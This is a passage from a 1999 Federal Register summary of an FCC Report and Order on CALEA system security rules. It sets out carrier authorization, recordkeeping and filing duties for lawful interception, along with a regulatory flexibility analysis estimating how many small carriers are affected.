the Commission declines to adopt a proposal to require carriers to [[Page 51463]] respond to an interception request within a specific time frame, the R&O encourages carriers to respond promptly and comply with any other relevant statutes concerning their duty to assist law enforcement authorities in performing an interception of communications or facilitating access to call-identifying information. 5. The R&O next clarifies the term ``appropriate authorization,'' as used in section 229(b)(1)(A) of the Communications Act, which requires that common carriers establish appropriate personnel supervision and control policies and procedures ``to require appropriate authorization to activate interception of communications or access to call-identifying information(.)'' <SUP>3</SUP> The R&O, based on the explicit language of section 105 of CALEA and section 229(b) of the Communications Act, concludes that ``appropriate authorization'' refers both to the legal authorization that law enforcement must present to a carrier in the form of an order, warrant, or other authorization issued by a judge or magistrate pursuant to federal or state statutory authority (appropriate legal authorization), and to the authorization a carrier's employee must receive from the carrier to assist law enforcement (appropriate carrier authorization) to engage in the interception of communication or the access to call-identifying information. The R&O concludes that a carrier satisfies the requirement for appropriate authorization only when a carrier's employee implements the interception of communications or access to call-identifying information in accordance with appropriate carrier authorization after having received legal authorizations. --------------------------------------------------------------------------- \3\ 47 U.S.C. 229(b)(1)(A). --------------------------------------------------------------------------- 6. The R&O also requires carriers to state in their internal policies and procedures that carrier personnel must receive both appropriate legal authorization and appropriate carrier authorization before taking any action to affirmatively implement the interception of communications or access to call-identifying information. Carriers must also, upon receipt of a proffered authorization by law enforcement, determine that such authorization is what it purports to be, and that it can be implemented technically, including that it is sufficiently and accurately detailed to enable the carrier to comply with its terms. The Commission notes, however, that its determination in the R&O under section 105 of CALEA and section 229 of the Communications Act regarding the level of scrunity applicable to a carrier's review of a court order or certification is in no way intended to alter or replace any standard or level of scrutiny imposed under any other state or federal statute. Accordingly, the R&O requires that, as part of their policies and procedures, carriers should also comply with appropriate authorization requirements contained in any other relevant state or federal statute when reviewing an authorization, and must ensure that their designated senior officer(s) or employee(s) responsible for affirmatively intervening to activate the interception of communications or access to call-identifying information is fully apprised of any additional relevant federal and state statutory provisions. 7. The R&O further provides that carriers must report all acts of unauthorized electronic surveillance that occur on their premises, as well as any compromises of the carrier's system security and integrity procedures that involve the execution of electronic surveillance, to the appropriate law enforcement agency. The R&O does not, however, impose a specific time frame within which a carrier must report a security breach. Rather, the R&O requires that carriers report such breaches within a reasonable period of time and in compliance with any other relevant statutes. 8. Additionally, in order to comply with section 229(b)(2), the carrier must maintain secure and accurate records of each interception of communication or access to call-identifying information, made with or without appropriate authorization, in the form of single certification. This certification must include, at a minimum: (1) The telephone number(s) and/or circuit identification numbers involved; (2) the start date and time of the opening of the circuit for law enforcement; (3) the identity of the law enforcement officer presenting the authorization; (4) the name of the judge or prosecuting attorney signing the authorization; (5) the type of interception of communications or access to call-identifying information; and (6) the name of the telecommunications carrier's personnel who is responsible for overseeing the interception of communication or access to call- identifying information and who is acting in accordance with the carrier's policies established under section 229(b)(1). The designated employee must sign each record, to certify the record is complete and accurate. The Order mandates that carriers maintain these records for ten years and keep records relating to the content of authorized interception for a period of time determined by individual carriers in accordance with policies and procedures established under section 229(b)(1) of the Communications Act and applicable state and federal statutes of limitation.<SUP>4</SUP> --------------------------------------------------------------------------- \4\ On July 16, 1999, the Commission adopted an Order on Reconsideration (Order) in this proceeding (FCC 99-184), which revises the recordkeeping and maintenance requirements adopted in the R&O. The Order eliminates the requirement that telecommunications carriers retain the content or call-identifying information of any interceptions of communications and the 10 year record retention requirement. Instead, carriers must retain the certification for a ``reasonable period of time.'' --------------------------------------------------------------------------- 9. The R&O adopts filing requirements in accordance with section 229(b)(3) of the Communications Act. In this regard, the R&O finds that all telecommunications carriers must submit to the Commission the policies and procedures adopted to comply with the requirements established under sections 229(b)(1) and (2), regardless of carrier size. The Commission will review carriers' policies procedures to determine whether they comply with the Commission's Rules. If the Commission determines that a carrier's policies and procedures are non- compliant, the carrier shall modify its policies and procedures in accordance with an order released by the Commission. Moreover, the Commission shall conduct investigations as may be necessary to ensure compliance by telecommunications carriers with the requirements of rules established by the Commission under section 229 of the Communications Act and section 105 of CALEA. 10. The R&O mandates that all carriers file their policies and procedures within 90 days from the effective date of the rules adopted in this R&O, and they must further file their policies and procedures with the Commission no later than 90 days after the effective date of a merger or divestiture in which a carrier becomes the surviving or divested entity. This 90 day filing requirement also applies to carriers who amend existing policies and procedures already filed with the Commission. 11. Finally, the R&O does not adopt any rules (in addition to the liabilities established by Congress in CALEA) that extend criminal and/ or civil liability, vicarious or otherwise, to a carrier for the violations of section 105 of CALEA and section 229 of the Communications Act. Instead, if a carrier violates the Commission's rules implementing section 105 of CALEA, the Commission shall enforce, pursuant to section 229(d), the penalties articulated in [[Page 51464]] sections 503(b) of the Communications Act and 1.80 of the Commission's Rules. Paperwork Reduction Act of 1995 Analysis 12. The actions contained in this R&O have been analyzed with respect to the Paperwork Reduction Act of 1995 and found to impose modified reporting and recordkeeping requirements or burdens on the public. Implementation of these modified reporting and recordkeeping requirements will be subject to approval by the Office of Management and Budget, as prescribed by the Act. The new or modified paperwork requirements contained in the Report and Order will go into effect December 22, 1999, dependent on OMB approval. Final Regulatory Flexibility Analysis 13. As required by section 603 of the Regulatory Flexibility Act (RFA), 5 U.S.C. 603, an Initial Regulatory Flexibility Analysis (IRFA) was incorporated in the NPRM. The Commission sought written public comments on the proposals in the NPRM, including the IRFA. The Commission's Final Regulatory Flexibility Analysis (FRFA) in this Report and Order conforms to the RFA, as amended by the Contract With America Advancement Act of 1996 (CWAAA), Public Law 104-121, 110 Stat. 847 (1996).<SUP>5</SUP> --------------------------------------------------------------------------- \5\ Subtitle II of the CWAAA is ``The Small Business Regulatory Enforcement Fairness Act of 1996'' (SBREFA), codified at 5 U.S.C. 601 et. seq. --------------------------------------------------------------------------- (1) Need for and Purpose of this Action 14. This Report and Order responds to the legislative mandate contained in the Communications Assistance for Law Enforcement Act, Public Law 103-414, 108 Stat. 4279 (1994). The Commission, in compliance with 47 U.S.C. 229, promulgated rules in this Report and Order to ensure the prompt implementation of section 105 of CALEA. In enacting CALEA, Congress sought to ``make clear a telecommunications carrier's duty to cooperate in the interception of communications for law enforcement purposes. . .'' <SUP>6</SUP> Specifically, Congress sought to balance three key policies with CALEA: ``(1) to preserve a narrowly focused capability for law enforcement agencies to carry out properly authorized intercepts; (2) to protect privacy in the face of increasingly powerful and personally revealing technologies; and (3) to avoid impeding the development of new communications services and technologies.'' <SUP>7</SUP> --------------------------------------------------------------------------- \6\ CALEA, supra, at preamble. \7\ H. Rep. No. 103-837 at 23, reprinted in 1994 U.S.C.C.A.N. 3489. --------------------------------------------------------------------------- 15. The rules adopted in this Report and Order implement Congress's goal to clarify a telecommunications carrier's duty to cooperate with law enforcement agencies that request lawful electronic surveillance, and to balance the three key policies, enumerated in this decision. The objective of the rules adopted in this Report and Order is to implement, as quickly and effectively as possible, the national telecommunications policy for telecommunications carriers to support the lawful electronic surveillance needs of law enforcement agencies. (2) Summary of the Issues Raised by Public Comments Made in Response to the IRFA Summary of Initial Regulatory Flexibility Analysis (IRFA) 16. In the NPRM, the Commission performed an IRFA and asked for comments that specifically addressed issues raised in the IRFA. In the IRFA, the Commission found that the rules it proposed to adopt in this proceeding may have a significant impact on a substantial number of small businesses as defined by section 601(3) of the RFA. 17. In the IRFA, the Commission reiterated its proposed rules in the NPRM requiring telecommunications carriers to establish policies and procedures governing the conduct of officers and employees who are engaged in surveillance activity. The proposed rules required telecommunications carriers to maintain records of all interceptions of communications and call identification information. Additionally, the proposed rules required telecommunications carriers to execute an affidavit for, and maintain a separate record of, each electronic surveillance. Furthermore, the Commission sought comment on the length of time telecommunications carriers should retain electronic surveillance records, noting that 18 U.S.C. 2518(8)(a) calls for a retention period of ten years for intercepted communications. The proposed rules also required telecommunications carriers to report security breaches (compromises to lawful electronic surveillance and illegal electronic surveillance) to both the Commission and the affected law enforcement agency. 18. In the IRFA, the Commission reiterated that our proposed rules require telecommunications carriers classified as Class A companies pursuant to 47 U.S.C. 32.11 to file individually with the Commission a statement of its processes and procedures used to comply with the systems security rules promulgated by the Commission. Telecommunications carriers classified as Class B companies pursuant to 47 U.S.C. 32.11 could elect either to file a statement describing their security processes and procedures or to certify that they observed procedures consistent with the security rules promulgated by the Commission. The Commission noted that because electronic surveillance capacity and capability requirements are still being developed it is not possible to predict with certainty whether the costs of compliance will be proportionate with regard to both small and large telecommunications carriers. 19. In the IRFA, the Commission tentatively concluded that a substantial number of telecommunications carriers who have been subjected to demands from law enforcement personnel to provide lawful interceptions and call-identifying information for a period time preceding CALEA already have in place practices for proper employee conduct and recordkeeping. The Commission noted that, as a practical matter, telecommunications carriers need such practices to protect themselves from suit by persons who claim they were the victims of illegal surveillance. By providing general guidance regarding the conduct of carrier personnel and the content of records in the proposed regulations, the Commission intended telecommunications carriers to use their existing practices to the maximum extent possible. Thus, in the IRFA, the Commission tentatively concluded that the additional cost to most telecommunications carriers for conforming to the Commission's proposed regulations, should be minimal. 20. Comments. Only one party filed comments in response to the IRFA, but many parties commented on the Commission's proposed system security and integrity regulations in response to the NPRM. The record provided by all of these commenting parties clearly disfavors the amount of recordkeeping proposed by the Commission in the NPRM, and includes numerous suggestions to reduce the amount of paperwork required by the proposed regulations without jeopardizing statutory compliance. Thus, the final regulations reduce significantly the amount of paperwork required of telecommunications carriers. Other parties commented that the Commission should not promulgate any new rules to [[Page 51465]] implement CALEA. A plain reading of 47 U.S.C. 229(b) shows that Congress requires the Commission to promulgate regulations that ensure the systems security and integrity of carriers, by compelling carriers to submit their CALEA systems security and integrity policies and procedures to the Commission and provide records that prove to the Commission how each telecommunications carrier is complying with the requirements of CALEA section 105. Thus, commentary against any new regulations contradicts the plain language of 47 U.S.C. 229. (3) Description and Estimates of the Number of Entities Affected by This Report and Order 21. Consistent with prior practice, the Commission shall continue to exclude small incumbent LECs from the definition of a small entity for the purpose of this FRFA. Nevertheless, as mentioned above, the Commission includes small incumbent LECs in the FRFA. Accordingly, the Commission's use of the terms ``small entities'' and ``small businesses'' does not encompass ``small incumbent LECs.'' The Commission uses the term ``small incumbent LECs'' to refer to any incumbent LECs that arguably might be defined by SBA as ``small business concerns.'' 22. Total Number of Telephone Companies Affected. Many of the decisions and rules adopted in the R&O may have a significant effect on a substantial number of the small telephone companies identified by SBA. The United States Bureau of the Census (``the Census Bureau'') reports that, at the end of 1992, there were 3,497 firms engaged in providing telephone services, as defined therein, for at least one year.<SUP>8</SUP> This number contains a variety of different categories of carriers, including local exchange carriers, interexchange carriers, competitive access providers, cellular carriers, mobile service carriers, operator service providers, pay telephone operators, PCS providers, covered SMR providers, and resellers. It seems certain that some of those 3,497 telephone service firms may not qualify as small entities or small incumbent LECs because they are not ``independently owned and operated.'' <SUP>9</SUP> For example, a PCS provider that is affiliated with an interexchange carrier having more than 1,500 employees would not meet the definition of a small business. It seems reasonable to conclude, therefore, that fewer than 3,497 telephone service firms are small entity telephone service firms or small incumbent LECs that may be affected by this Report and Order. --------------------------------------------------------------------------- \8\ United States Department of Commerce, Bureau of the Census, 1992 Census of Transportation, Communications, and Utilities: Establishment and Firm Size, at Firm Size 1-123 (1995) (1992 Census). \9\ 15 U.S.C. 632(a)(1). --------------------------------------------------------------------------- 23. Wireline Carriers and Service Providers. SBA has developed a definition of small entities for telephone communications companies other than radiotelephone (wireless) companies. The Census Bureau reports that, there were 2,321 such telephone companies in operation for at least one year at the end of 1992. According to SBA's definition, a small business telephone company other than a radiotelephone company is one employing fewer than 1,500 persons. All but 26 of the 2,321 non-radiotelephone companies listed by the Census Bureau were reported to have fewer than 1,000 employees. Thus, even if all 26 of those companies had more than 1,500 employees, there would still be 2,295 non-radiotelephone companies that might qualify as small entities or small incumbent LECs. Although it seems certain that some of these carriers are not independently owned and operated, we are unable at this time to estimate with greater precision the number of wireline carriers and service providers that would qualify as small business concerns under SBA's definition. Consequently, we estimate that there are fewer than 2,295 small entity telephone communications companies other than radiotelephone companies that may be affected by the decisions and rules adopted in this Report and Order. 24. Local Exchange Carriers. Neither the Commission nor SBA has developed a definition of small providers of local exchange services (LECs). The closest applicable definition under SBA rules is for telephone communications companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of LECs nationwide of which the Commission is aware appears to be the data that we collect annually in connection with the Telecommunications Relay Service (TRS). According to the most recent data, 1,347 companies reported that they were engaged in the provision of local exchange services.<SUP>10</SUP> Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, The Commission is unable at this time to estimate with greater precision the number of LECs that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 1,347 small incumbent LECs that may be affected by the decisions and rules adopted in this Report and Order. --------------------------------------------------------------------------- \10\ Federal Communications Commission, CCB, Industry Analysis Division, Telecommunications Industry Revenue: TRS Fund Worksheet Data, Tbl. 1 (Average Total Telecommunications Revenue Reported by Class of Carrier) (Dec. 1996) (TRS Worksheet). --------------------------------------------------------------------------- 25. Interexchange Carriers. Neither the Commission nor SBA has developed a definition of small entities specifically applicable to providers of interexchange services (IXCs). The closest applicable definition under SBA rules is for telephone communications companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of IXCs nationwide of which the Commission is aware appears to be the data collected annually in connection with the TRS Worksheet. According to the most recent data, 130 companies reported that they were engaged in the provision of interexchange services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of IXCs that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 130 small entity IXCs that may be affected by the decisions and rules adopted in this Report and Order. 26. Competitive Access Providers. Neither the Commission nor SBA has developed a definition of small entities specifically applicable to providers of competitive access services (CAPs). The closest applicable definition under SBA rules is for telephone communications companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of CAPs nationwide of which the Commission is aware appears to be the data that we collect annually in connection with the TRS Worksheet. According to the most recent data, 57 companies reported that they were engaged in the provision of competitive access services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of CAPs that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 57 small entity CAPs that may be affected by the decisions and rules adopted in this Report and Order. [[Page 51466]] 27. Operator Service Providers. Neither the Commission nor SBA has developed a definition of small entities specifically applicable to providers of operator services. The closest applicable definition under SBA rules is for telephone communications companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of operator service providers nationwide of which the Commission is aware appears to be the data collected annually in connection with the TRS Worksheet. According to the most recent data, 25 companies reported that they were engaged in the provision of operator services. Although it seems certain that some of these companies are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of operator service providers that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 25 small entity operator service providers that may be affected by the decisions and rules adopted in this Report and Order. 28. Wireless (Radiotelephone) Carriers. SBA has developed a definition of small entities for radiotelephone (wireless) companies. The Census Bureau reports that there were 1,176 such companies in operation for at least one year at the end of 1992. According to SBA's definition, a small business radiotelephone company is one employing fewer than 1,500 persons.<SUP>11</SUP> The Census Bureau also reported that 1,164 of those radiotelephone companies had fewer than 1,000 employees. Thus, even if all of the remaining 12 companies had more than 1,500 employees, there would still be 1,164 radiotelephone companies that might qualify as small entities if they are independently owned are operated. Although it seems certain that some of these carriers are not independently owned and operated, the Commission is unable at this time to estimate with greater precision the number of radiotelephone carriers and service providers that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 1,164 small entity radiotelephone companies that may be affected by the decisions and rules adopted in this Report and Order. --------------------------------------------------------------------------- \11\ 13 CFR 121.201, Standard Industrial Classification (SIC) Code 4812. --------------------------------------------------------------------------- 29. Cellular Service Carriers. Neither the Commission nor the SBA has developed a definition of small entities specifically applicable to Cellular Service Carriers and to Mobile Service Carriers. The closest applicable definition under SBA rules for both services is for telephone companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of Cellular Service Carriers and Mobile Service Carriers nationwide of which the Commission is aware appears to be the data collected annually in connection with the TRS Worksheet. According to the most recent data, 792 companies reported that they are engaged in the provision of cellular services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of cellular service carriers that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 792 small entity cellular service carriers that might be affected by the actions and rules adopted in this Report and Order. 30. Mobile Service Carriers. Neither the Commission or the SBA has developed a definition of small entities specifically applicable to mobile service carriers, such as paging companies. The closest applicable definition under SBA rules is for radiotelephone (wireless) companies. The most reliable source of information regarding the number of mobile service carriers nationwide of which the Commission is aware appears to be the data collected annually in connection with the TRS Worksheet. According to the most recent data, 138 companies reported that they were engaged in the provision of mobile services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of mobile service carriers that would qualify under SBA's definition. Consequently, the Commission estimates that there are fewer than 138 small entity mobile service carriers that may be affected by the decision and rules adopted in this Report and Order. 31. Broadband Personal Communications Service. The broadband PCS spectrum is divided into six frequency blocks designated A through F, and the Commission has held auctions for each block. The Commission defined ``small entity'' for Blocks C and F as an entity that has average gross revenues of less than $40 million in the three previous calendar years. For Block F, an additional classification for ``very small business'' was added, and is defined as an entity that, together with its affiliates, has average gross revenues of not more than $15 million for the preceding three calendar years. These regulations defining ``small entity'' in the context of broadband PCS auctions have been approved by SBA. No small businesses within the SBA-approved definition bid successfully for licenses in Blocks A and B. There were 90 winning bidders that qualified as small entities in the Block C auctions. A total of 93 small and very small business bidders won approximately 40% of the 1,479 licenses for Blocks D, E, and F. However, licenses for Blocks C through F have not been awarded fully, therefore there are few, if any, small businesses currently providing PCS services. Based on this information, the Commission concludes that the number of small broadband PCS licenses will include the 90 winning C Block bidders and the 93 qualifying bidders in the D, E, and F blocks, for a total of 183 small PCS providers as defined by the SBA and the Commission's auction rules. 32. SMR Licensees. Pursuant to 47 CFR 90.814(b)(1), the Commission has defined ``small entity'' in auctions for geographic area 800 MHz and 900 MHz SMR licenses as a firm that had average annual gross revenues of less than $15 million in the three previous calendar years. This definition of a ``small entity'' in the context of 800 MHz and 900 MHz SMR has been approved by the SBA. The rules adopted in this Report and Order may apply to SMR providers in the 800 MHz and 900 MHz bands that either hold geographic area licenses or have obtained extended implementation authorizations. The Commission does not know how many firms provide 800 MHz or 900 MHz geographic area SMR service pursuant to extended implementation authorizations, nor how many of these providers have annual revenues of less than $15 million. The Commission assumes, for purposes of this FRFA, that all of the extended implementation authorizations may be held by small entities, which may be affected by the decisions and rules adopted in this Report and Order. 33. The Commission recently held auctions for geographic area licenses in the 900 MHz SMR band. There were 60 winning bidders who qualified as small entities in the 900 MHz auction. Based on this information, the Commission concludes that the number of geographic area SMR licensees affected [[Page 51467]] by the rule adopted in this Report and Order includes these 60 small entities. No auctions have been held for 800 MHz geographic area SMR licenses. Therefore, no small entities currently hold these licenses. A total of 525 licenses will be awarded for the upper 200 channels in the 800 MHz geographic area SMR auction. The Commission, however, has not yet determined how many licenses will be awarded for the lower 230 channels in the 800 MHz geographic area SMR auction. There is no basis, moreover, on which to estimate how many small entities will win these licenses. Given that nearly all radiotelephone companies have fewer than 1,000 employees and that no reliable estimate of the number of prospective 800 MHz licensees can be made, we assume, for purposes of this FRFA, that all of the licenses may be awarded to small entities who, thus, may be affected by the decisions adopted in this Report and Order. 34. Resellers. Neither the Commission nor SBA has developed a definition of small entities specifically applicable to resellers. The closest applicable definition under SBA rules is for all telephone communications companies. The most reliable source of information regarding the number of resellers nationwide of which the Commission is aware appears to be the data collected annually in connection with the TRS. According to the most recent data, 260 companies reported that they were engaged in the resale of telephone services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of resellers that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 260 small entity resellers that may be affected by the decisions and rules adopted in this Report and Order. 35. Pay Telephone Operators. Neither the Commission nor the SBA has developed a definition of small entities specifically applicable to pay telephone operators. The closest applicable definition under SBA rules is for telephone communications companies other than radiotelephone (wireless) companies. The most reliable source of information regarding the number of pay telephone operators nationwide of which the Commission is aware appears to be the data collected annually with the TRS Worksheet. According to the most recent data, 271 companies reported that they were engaged in the provision of pay telephone services. Although it seems certain that some of these carriers are not independently owned and operated, or have more than 1,500 employees, the Commission is unable at this time to estimate with greater precision the number of pay telephone operators that would qualify as small business concerns under SBA's definition. Consequently, the Commission estimates that there are fewer than 271 small entity pay telephone operators that may be affected by the decisions and rules adopted in this Report and Order. 36. Cable Services or Systems. SBA has developed a definition of small entities for cable and other pay television services, which includes all such companies generating $11 million or less in revenue annually.<SUP>12</SUP> This definition includes cable systems operators, closed circuit television services, direct broadcast satellite services, multipoint distribution systems, satellite master antenna systems and subscription television services. According to the Census Bureau, there were 1,788 such cable and other pay television services and 1,439 had less than $11 million in revenues.<SUP>13</SUP> --------------------------------------------------------------------------- \12\ 13 CFR 121.201, SIC Code 4841. \13\ 1992 Economic Census Industry and Enterprise Receipts Size Report, Table 2D, SIC 4841 (U.S. Bureau of the Census data under contract to the Office of Advocacy of the U.S. Small Business Administration). --------------------------------------------------------------------------- 37. The Commission has developed its own definition of a small cable system operator for the purposes of rate regulation. Under the Commission's Rules, a ``small cable company'' is one serving fewer than 400,000 subscribers nationwide.<SUP>14</SUP> Based on the most recent information, the Commission estimates that there were 1,439 cable operators that qualified as small cable system operators at the end of 1995. Since then, some of those companies may have grown to serve over 400,000 subscribers, and others may have been involved in transactions that caused them to be combined with other cable operators. Consequently, the Commission estimates that there are fewer than 1,439 small entity cable system operators that may be affected by the decisions and rules adopted in this Report and Order. --------------------------------------------------------------------------- \14\ 47 CFR 76.901(e). --------------------------------------------------------------------------- 38. The Communications Act also contains a definition of a small cable system operator, which is ``a cable operator that, directly or through an affiliate, serves in the aggregate fewer than 1 percent of all subscribers in the United States and is not affiliated with any entity or entities whose gross annual revenues in the aggregate exceed $250,000,000.'' <SUP>15</SUP> The Commission has determined that there are 61,700,000 subscribers in the United States. Therefore, the Commission found that an operator serving fewer than 617,000 subscribers shall be deemed a small operator if its annual revenues, when combined with the total annual revenues of all of its affiliates, do not exceed $250 million in the aggregate.<SUP>16</SUP> Based on available data, the Commission finds that the number of cable operators serving 617,000 subscribers or less totals 1,450. The Commission does not request nor do we collect information concerning whether cable system operators are affiliated with entities whose gross annual revenues exceed $250,000,000, and thus are unable at this time to estimate with greater precision the number of cable system operators that would qualify as small cable operators under the definition in the Communications Act. The Commission further notes that recent industry estimates project that there will be a total of 65,000,000 subscribers, and the Commission has based our fee revenue estimates on that figure. --------------------------------------------------------------------------- \15\ 47 U.S.C. 543(m)(2). \16\ 47 CFR 76.1403(b). --------------------------------------------------------------------------- 39. Other Pay Services. In the IRFA, the Commission included a category entitled ``other pay services.'' Other pay services are also classified under SIC 4841, which include cable operators, closed circuit television services, direct broadcast satellite services (DBS), multipoint distribution systems (MDS), satellite master antenna systems (SMATV), and subscription television services. The Commission received no comments regarding service providers in this category in response to either the IRFA or the NPRM at large. Accordingly, the Commission cannot determine at this time the number of service providers in this category that intend to offer services to the public as telecommunications carriers, and become subject to CALEA's requirements. (4) Summary Analysis of the Projected Reporting, Recordkeeping and Other Compliance Requirements and Steps Taken to Minimize the Significant Economic Impact of this Report and Order on Small Entities, Including Significant Alternatives Considered and Rejected. 40. In this section of the FRFA, the Commission analyzes the projected reporting, recordkeeping, and other compliance requirements that may apply to small entities as a result of this Report and Order. The Commission also [[Page 51468]] describes the steps taken to minimize the economic impact of our decisions on small entities, including the significant alternatives considered and rejected. 41. In the final regulations, the Commission affirms the proposal in the NPRM to establish regulations that are general in nature and provide as guidance, so that telecommunications carriers may utilize their existing policies and procedures to the greatest extent possible. In addition, the Commission eliminated all references to proposed rules and tentative conclusions relating to vicarious liability arising out of a telecommunications carrier's failure to accomplish either of CALEA section 105's two objectives. 42. In the final regulations, the Commission eliminated all regulations originally proposed pursuant to 47 U.S.C. 229(b)(1) that appeared to go beyond the scope of CALEA section 105, overlapped other proposed regulations, were unnecessarily cumbersome, or otherwise unnecessary. Accordingly, carriers must: (1) Appoint a senior officer or employee as point of contact responsible for affirmatively intervening to ensure that interception of communications or access to call-identifying information can be activated only in accordance with the appropriate legal authorization; (2) include a description of the job function of the appointed point of contact for law enforcement to reach on a daily, around-the-clock basis in their policies and procedures; (3) effectuate a requested interception promptly; (4) incorporate our interpretation of the phrase ``appropriate authorization'' in their policies and procedures; (5) state in their policies and procedures that carrier personnel must receive appropriate legal authorization, before enabling law enforcement officials to implement the interception of communications or access to call- identifying information; (6) require the appointed senior point of contact to be apprised of all relevant federal and state statutory provisions concerning the lawful interception of communications or access to call-identifying information; (7) report security compromises and unlawful interception of communications or access to call- identifying information to the appropriate law enforcement authorities within a reasonable length of time after discovery; (8) maintain a secure and accurate record of each interception of communications or access to call-identifying information, made with or without appropriate authorization, in the form of single certification; (9) maintain secure and records of call-identifying information and unauthorized interceptions (including the content of the unauthorized interception) for ten years; <SUP>17</SUP> 10) maintain secure and accurate records of the content of each authorized interception of communications for a period of time determined by them in accordance with the policies and procedures that they establish under section 229(b)(1) of the Communications Act and applicable state and federal statutes of limitation; (11) provide a detailed description of how long it will maintain its records of intercept content; and (12) file with the Commission, within 90 days of the effective date of these rules, the policies and procedures it uses to comply with the requirements of this subchapter, and thereafter, within 90 days of a carrier's merger or divestiture or a carrier's amendment of its existing policies and procedures. --------------------------------------------------------------------------- \17\ See footnote 4 of this summary. --------------------------------------------------------------------------- 43. The Commission eliminated the requirement of ``designated employees,'' and the requirement for telecommunications carriers to provide updated lists of designated employees that included personal information about them, to law enforcement agencies. Instead, telecommunications carriers, as part of their policies and procedures, should only appoint a senior authorized officer or employee as a point of contact for law enforcement to reach on a daily, around-the-clock basis. Telecommunications carriers will include a description of the job function of the designated point of contact and a method to enable law enforcement authorities to contact the individual employed in this capacity in their polices and procedures. 44. The Commission eliminated the proposed regulation requiring a separate affidavit and a separate record for each surveillance. Instead, the final regulation requires that telecommunications carriers compile and maintain a single record of each intercepted communications or access to call-identifying information, certified by a carrier employee in charge of that electronic surveillance, that contains the following information: (1) The telephone number(s) and/or circuit identification number(s) involved; (2) the start date and time of the opening of the circuit for law enforcement; (3) the identity of the law enforcement officer presenting the authorization; (4) the name of the judge or prosecuting attorney who signed the authorization; (5) the type of intercepted communications or access to call-identifying information; (6) the name(s) of the telecommunications carriers' personnel who are responsible for overseeing the interception of communications or access to call-identifying information and who are acting in accordance with the carriers' policies and procedures established under 47 U.S.C. 229(b)(1). This record shall be signed by the individual who is responsible for overseeing the interception of communications or access to call-identifying information and who is acting in accordance with the carriers' policies and procedures established under 47 U.S.C. 229(b)(1). To avoid duplicating the existing ten year record retention requirement for records of authorized interception content in 18 U.S.C. 2518(8)(a), the Commission allows telecommunications carriers to retain records of the content of authorized interceptions for a period of time that they find reasonably necessary. However, because 18 U.S.C. 2518(8)(a) does not encompass records of call-identifying information and records of unauthorized interceptions, the Commission requires carriers to maintain secure and records of call-identifying information and unauthorized interceptions (including the content of the unauthorized interception) for ten years.<SUP>18</SUP> --------------------------------------------------------------------------- \18\ See Order on Reconsideration which revises this regulation, and which will be published shortly in the Federal Register. --------------------------------------------------------------------------- In the final regulations, the Commission did not affirm our proposal to provide a lessened reporting requirement for carriers that fell below the gross annual revenue threshold established in 47 CFR 32.9000 of the Commission's Rules. The Commission concludes that 47 U.S.C. 229(b)(3) requires all telecommunications carriers to submit their policies and procedures to the Commission established under 47 U.S.C. 229(b)(1) and (2). The statute makes no distinction between classes of telecommunications carriers for the purpose of lessening the regulatory burden for smaller carriers. Accordingly, the Commission's final regulations contain the requirement that all telecommunications carriers must file their systems security and integrity policies and procedures with the Commission, within 90 days of this Report and Order's effective date. The Commission notes, however, that since the proposed regulations have been drastically reduced, the burden imposed by the regulations adopted herein is also significantly reduced for all telecommunications carriers, including the smaller ones. [[Page 51469]] (5) Report to Congress 46. The Commission shall send a copy of this FRFA, along with this Report and Order, in a report to Congress pursuant to the Small Business Regulatory Enforcement Fairness Act of 1996, 5 U.S.C. 801(a)(1)(A). A copy of this FRFA will also be published in the Federal Register. Ordering Clauses 47. Accordingly, it is ordered that, pursuant to sections 4(i), 4(j), and 229 of the Communications Act of 1934, as amended, 47 U.S.C. 154(i), 154(j), and 229, and section 105 of the Communications Assistance for Law Enforcement Act, 47 U.S.C. 1004, the rules are adopted. 48. It is further ordered that the rules will become effective December 22, 1999 except for Secs. 64.2103, 64.2104, and 64.2105, which contain information collection requirements that have not been approved by the Office of Management and Budget. The FCC will publish a document in the Federal Register announcing the effective date for those sections. 49. It is further ordered that the Regulatory Flexibility Analysis, as required by Section 604 of the Regulatory Flexibility Act, and as set forth above is adopted. 50. It is further ordered that the Commission's Office of Public Affairs, Reference Operations Division, shall send a copy of this Report and Order, including the Final Regulatory Flexibility Analysis, to the Chief Counsel for Advocacy of the Small Business Administration. Paperwork Reduction Act 52. This Report and Order contains a modified information collection. The Commission, as part of its continuing effort to reduce paperwork burdens, invites the general public and the Office of Management and Budget (OMB) to comment on the information collections contained in this Report and Order, as required by the Paperwork Reduction Act of 1995, Public Law 104-13. Public and agency comments are due November 22, 1999; OMB comments are due 90 days from date of publication of this Report and Order in the Federal Register. Comments should address: (a) whether the proposed collection of information is necessary for the proper performance of the functions of the Commission, including whether the information shall have practical utility; (b) the accuracy of the Commission's burden estimates; (c) ways to enhance the quality, utility, and clarity of the information collected; and (d) ways to minimize the burden of the collection of information on the respondents, including the use of automated collection techniques or other forms of information technology. OMB Approval Number: 3060-0809. Title: Communications Assistance for Law Enforcement Act, Report and Order. Form No.: N/A. Type of Review: Revision of existing collection. Respondents: Business or other for profit. Number of Respondents: 5000. Estimated Time Per Response: 53 hours. Total Annual Cost Burden: $11,850,000. Total Annual Burden: 265,000 hours. Needs and Uses: The information submitted to the Commission by telecommunications 